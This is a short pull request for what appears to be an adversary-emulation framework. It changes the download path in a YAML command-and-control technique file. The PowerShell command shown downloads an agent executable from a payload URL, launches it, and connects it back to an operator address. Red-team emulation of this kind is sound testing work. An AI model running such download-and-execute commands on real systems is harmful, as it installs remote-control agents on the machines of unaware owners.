### PR TITLE
fix download path to match the running command

### DIFF
--- a/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
+++ b/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
@@ -36,6 +36,6 @@ platforms:
     psh:
       command: |
         $wc = New-Object System.Net.WebClient; 
-        $wc.DownloadFile("#{payload.url}","C:\Users\Public\pneuma-windows.exe"); 
+        $wc.DownloadFile("#{payload.url}","pneuma-windows.exe"); 
         Start-Process -FilePath .\pneuma-windows.exe -ArgumentList "-name $env:COMPUTERNAME -address #{operator.tcp}"
       payload: pneuma-windows.exe


### PR DESCRIPTION
Fix to download pneuma into the current directory on windows, so the execute command will run properly.